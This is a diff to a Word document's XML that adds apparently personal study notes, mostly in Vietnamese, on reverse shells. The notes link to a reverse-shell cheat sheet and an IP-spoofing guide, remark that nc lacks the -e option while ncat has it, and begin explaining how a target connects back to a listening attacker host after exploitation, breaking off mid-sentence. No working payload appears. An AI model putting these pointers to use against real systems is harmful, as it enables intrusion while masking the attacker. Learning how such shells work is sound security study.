--- a/demo/note.docx
+++ b/demo/note.docx
@@ -1425,10 +1425,5278 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="6" w:space="5" w:color="FBEDBB"/>
+          <w:left w:val="single" w:sz="6" w:space="5" w:color="FBEDBB"/>
+          <w:bottom w:val="single" w:sz="6" w:space="5" w:color="FBEDBB"/>
+          <w:right w:val="single" w:sz="6" w:space="5" w:color="FBEDBB"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FBEDBB"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
+        <w:t>aspx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> :</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId5" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://stackoverflow.com/questions/10182751/server-client-send-receive-simple-text</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
       </w:pPr>
+      <w:hyperlink r:id="rId6" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://www.youtube.com/watch?v=eFR93buUAFk</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>ncat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">( </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> )</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>kill -9 apt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">( </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>không</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> option – e)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>ncat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:hyperlink r:id="rId7" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId8" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>https://maytinhkhoe.com/thu-thuat/huong-dan-fake-ip-don-gian-bang-phan-mem-proxifier.html/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Tìm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>hiểu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>về</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> reverse shell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Reverse shell </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>là</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>loại</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> session shell (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ngoài</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ra</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>còn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> web shell, bind </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>shell,..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>là</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> shell </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>kết</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nối</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>bắt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nguồn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>từ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>chủ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>đóng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>vai</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>trò</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>là</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> target </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>đến</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>chủ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>khác</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>đóng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>vai</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>trò</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> host . </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Khi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>đó</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> target </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>sẽ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>tạo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>kết</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nối</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ra</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>bên</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ngoài</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>và</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> host </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>sẽ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>lắng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nghe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Trong</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>trường</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>hợp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Attacker </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>mà</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>đã</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>khai</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>thác</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>được</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>lỗ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>hổng</w:t>
+      </w:r>
